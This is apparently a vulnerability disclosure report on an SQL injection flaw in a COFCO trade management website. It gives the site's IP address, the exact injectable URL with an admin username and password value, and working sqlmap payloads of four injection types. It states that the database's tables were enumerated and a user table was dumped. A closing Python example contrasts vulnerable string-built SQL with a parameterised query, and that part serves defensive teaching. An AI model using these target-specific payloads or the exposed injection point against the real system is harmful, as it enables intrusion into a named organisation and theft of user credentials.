A COFCO website has a SQL injection vulnerability (more than 800 tables can be retrieved from the database)
COFCO Trade Business Management System: http://219.143.252.178/. A SQL injection vulnerability exists. Through the injection, more than 800 tables can be obtained from the database, and an attacker could obtain a large amount of sensitive information such as usernames and passwords.
Injection point: http://219.143.252.178/verifiADCode_do.jsp?pwd=135791&username=admin
The injectable parameter is username.
Parameter: username (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pwd=135791&username=admin' AND 3189=3189 AND 'xpOs'='xpOs

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)
    Payload: pwd=135791&username=admin' AND 3287=DBMS_UTILITY.SQLID_TO_SQLHASH((CHR(113)||CHR(120)||CHR(118)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (3287=3287) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113))) AND 'oDSL'='oDSL

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: pwd=135791&username=admin' AND 2674=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'WiyK'='WiyK

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: pwd=135791&username=admin' UNION ALL SELECT CHR(113)||CHR(120)||CHR(118)||CHR(122)||CHR(113)||CHR(89)||CHR(113)||CHR(98)||CHR(116)||CHR(80)||CHR(88)||CHR(86)||CHR(107)||CHR(81)||CHR(66)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113),NULL FROM DUAL--
Database information can be read through the injection.
The current database is TRADE_BUSINESS, and more than 800 tables can be enumerated.
The OU_USER table was dumped for verification.
Solution:
Filter user input.
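As an added example (not code from this report or from the COFCO system, whose source is not shown), the following Python/sqlite3 reconstruction shows why the boolean-based blind probes listed in the sqlmap output above produce a usable true/false signal, and why a parameterised query removes that signal where input filtering alone is fragile. The table name ou_user, its columns and the sample rows are assumptions made for the example.

```python
import sqlite3

# Constructed sample data standing in for the dumped OU_USER table
# (the real schema is unknown; table name, columns and rows are assumptions).
SAMPLE_ROWS = [("admin", "135791"), ("guest", "guest")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ou_user (username TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO ou_user VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def verify_vulnerable(conn, username, pwd):
    # Mirrors the flaw the report implies: request parameters spliced into SQL,
    # so a quote in username changes the structure of the statement.
    sql = ("SELECT COUNT(*) FROM ou_user WHERE username = '" + username
           + "' AND pwd = '" + pwd + "'")
    return conn.execute(sql).fetchone()[0] > 0


def verify_fixed(conn, username, pwd):
    # Parameterised query: the values travel separately from the statement,
    # so the probe is compared as a literal username and matches nothing.
    sql = "SELECT COUNT(*) FROM ou_user WHERE username = ? AND pwd = ?"
    return conn.execute(sql, (username, pwd)).fetchone()[0] > 0


# The boolean-based blind probe from the sqlmap output above, plus the same
# shape with a false condition; a blind tool compares the two responses.
TRUE_PROBE = "admin' AND 3189=3189 AND 'xpOs'='xpOs"
FALSE_PROBE = "admin' AND 3189=3188 AND 'xpOs'='xpOs"


def blind_signal(verify):
    """Return (result for true probe, result for false probe).

    A difference between the two is the oracle a blind injection relies on;
    the fixed function returns the same answer for both."""
    conn = make_db()
    return (verify(conn, TRUE_PROBE, "135791"),
            verify(conn, FALSE_PROBE, "135791"))


if __name__ == "__main__":
    print("vulnerable:", blind_signal(verify_vulnerable))  # (True, False)
    print("fixed:     ", blind_signal(verify_fixed))       # (False, False)
```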